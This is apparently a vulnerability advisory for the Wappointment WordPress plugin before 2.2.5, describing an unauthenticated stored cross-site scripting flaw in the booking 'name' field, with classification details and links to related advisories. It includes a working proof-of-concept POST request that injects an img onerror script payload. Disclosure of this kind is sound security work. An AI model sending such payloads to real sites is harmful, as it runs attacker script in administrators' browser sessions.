Wappointment < 2.2.5 – Unauthenticated Stored Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not sanitise the name parameter when booking an appointment, leading to a Stored Cross-Site Scripting issue which is triggered when an admin view the Calendar.

Proof of Concept

POST /wp-json/wappointment/v1/services/booking HTTP/1.1
Content-Length: 205
Accept: application/json, text/plain, */*
Content-Type: application/json
Referer: http://domain.com/booking-page/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"email":"testemail@testemail.com","name":"testname\"><img src=x onerror=prompt(1)>","phone":"+00 00 000000","time":1630666800,"ctz":"Europe/Bucharest","service":1,"location":3,"duration":90,"staff_id":2}

Affects Plugins

Fixed in 2.2.5

References

Exploitdb

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Renos Nikolaou

Verified

Yes

WPVDB ID

a2b816a4-9faf-40ea-a81d-88687f99de77

Timeline

Publicly Published

2021-09-27 (about 4 years ago)

Added

2021-09-27 (about 4 years ago)

Last Updated

2022-04-14 (about 3 years ago)

Other

Published

Title

Published

2025-04-10

Title

Vice Versa <= 2.2.3 - Reflected Cross-Site Scripting

Published

2020-07-09

Title

Powie's WHOIS Domain Check < 0.9.33 - Authenticated Stored Cross-Site Scripting

Published

2023-11-15

Title

Daily Prayer Time < 2023.10.21 - Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode

Published

2024-04-16

Title

CBX Bookmark & Favorite < 1.7.22 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-12-27

Title

RestroPress <= 3.2.4.2 - Authenticated (Contributor+) Stored Cross-Site Scripting